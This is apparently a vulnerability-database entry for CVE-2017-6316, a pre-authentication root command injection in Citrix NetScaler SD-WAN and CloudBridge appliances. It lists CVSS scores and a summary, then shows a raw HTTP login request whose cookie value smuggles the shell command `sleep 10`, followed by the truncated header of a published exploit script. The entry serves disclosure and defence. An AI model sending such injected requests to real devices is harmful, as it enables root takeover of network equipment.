CVE-2017-6316

Published: 20/07/2017 Updated: 16/09/2017
CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10
CVSS v3 Base Score: 9.8 | Impact Score: 5.9 | Exploitability Score: 3.9
VMScore: 1000
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

Citrix NetScaler SD-WAN devices through v9.1.2.26.561201 allow remote malicious users to execute arbitrary shell commands as root via a CGISESSID cookie. On CloudBridge (the former name of NetScaler SD-WAN) devices, the cookie name was CAKEPHP rather than CGISESSID.

Vulnerable Product

citrix netscaler sd-wan

Exploits

POST /cgi-bin/login.cgi?redirect=/ HTTP/1.1
Host: 10242129149
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: 10242129149/cgi-bin/login.cgi?redirect=/
Cookie: CAKEPHP=`sleep 10`
Content-Type: application/x-www-form-urlencoded
Content-Len ...

# Exploit Title: Citrix SD-WAN logout cookie preauth Remote Command Injection Vulnerability
# Date: 02/20/2017
# Exploit Author: xort @ Critical Start
# Vendor Homepage: www.citrix.com
# Software Link: www.citrix.com/downloads/cloudbridge/
# Version: 9.1.2.26.561201
# Tested on: 9.1.2.26.561201 (OS partition 46)
#
# CVE : (await ...